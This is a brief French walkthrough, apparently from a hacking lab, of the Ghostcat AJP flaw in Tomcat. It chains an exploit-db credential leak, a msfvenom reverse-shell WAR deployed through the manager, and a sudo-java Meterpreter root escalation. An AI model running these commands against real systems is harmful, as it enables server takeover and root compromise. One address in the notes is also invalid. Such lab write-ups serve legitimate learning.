Il existe une vulnérabilité dans Tomtom et le service AJP (ghostcat). Ce service est un protocole différent pour accéder à l’interface administrateur.
wget https://www.exploit-db.com/download/48143
python2 48143.py 10.10.151.49 #on retrouve un utilisateur et mot de passe.
msfvenom -p java/shell_reverse_tcp lhost=10.9.0.60 lport=4444 -f war -o pwn.war
curl -u user_found --upload-file pwn.war http://10.10.151.49:8080/manager/text/deploy?path=/shell #il y a aussi la possibilité d'uploader avec l'interface html
nc -nlvp 4444
On peut maintenant accéder à http://10.10.511.49/shell
Par la suite, on peut trouver un exploit pour obtenir le compte d’un utilisateur. Par exemple, si on peut exécuter java comme “root”
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.9.0.60 LPORT=4445 -f raw -o /tmp/revmet.jar
msfconsole
use exploit/multi/handler
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.9.0.60
set LPORT 4445
set ExitOnSession false
exploit -j -z
et puis dans le shell sur l’ordinateur de la victime : sudo java -jar revmet.jar